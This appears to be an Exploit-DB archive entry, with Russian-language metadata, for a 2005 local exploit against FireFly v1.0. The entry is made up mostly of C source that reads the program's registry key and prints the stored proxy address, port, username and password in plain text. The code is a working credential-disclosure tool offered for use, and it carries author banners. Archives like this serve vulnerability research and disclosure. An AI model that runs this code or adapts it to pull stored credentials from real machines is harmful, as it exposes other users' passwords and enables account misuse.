Exploit FireFly 1.0 - Local Proxy Password Disclosure

[Exploiter]

EDB-ID

919

Проверка EDB

1. Пройдено

Автор

KOZAN

Тип уязвимости

LOCAL

Платформа

WINDOWS

CVE

null

Дата публикации

2005-04-07

/*****************************************************************

FireFly v1.0 Local Exploit by Kozan

Application: FireFly v1.0
Vendor: NetCruiser Software - www.netcruiser-software.com
Vulnerable Description: FireFly v1.0 discloses proxy passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxyaddr[BUFSIZE],
        proxyport[BUFSIZE],
        proxyuser[BUFSIZE],
        proxypass[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FireFly
FileFinder\\GnutellaServer",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

                       lRet = RegQueryValueEx( hKey, "ProxyAddr", NULL, NULL,(LPBYTE) proxyaddr,&dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                strcpy(proxyaddr,"Not found!");
                       }
           lRet = RegQueryValueEx( hKey, "ProxyPass", NULL, NULL,(LPBYTE) proxypass, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                strcpy(proxypass,"Not found!");
                       }
                       lRet = RegQueryValueEx( hKey, "ProxyUser", NULL, NULL,(LPBYTE) proxyuser, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                strcpy(proxyuser,"Not found!");
                       }
                       lRet = RegQueryValueEx( hKey, "ProxyPort", NULL, NULL,(LPBYTE) proxyport, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                strcpy(proxyport,"Not found!");
                       }

           RegCloseKey( hKey );

                       printf("FireFly v1.0 Local Exploit by Kozan\n");
                       printf("Credits to ATmaCA\n");
                       printf("www.netmagister.com  -  www.spyinstructors.com\n");
                       printf("[email protected]\n\n");
                       printf("Proxy Address   : %s\n",proxyaddr);
                       printf("Proxy Port      : %s\n",proxyport);
                       printf("Proxy Username  : %s\n",proxyuser);
                       printf("Proxy Password  : %s\n",proxypass);

        }
        else{
                printf("FireFly v1.0 is not installed on your system!\n");
        }

       return 0;
}

// milw0rm.com [2005-04-07]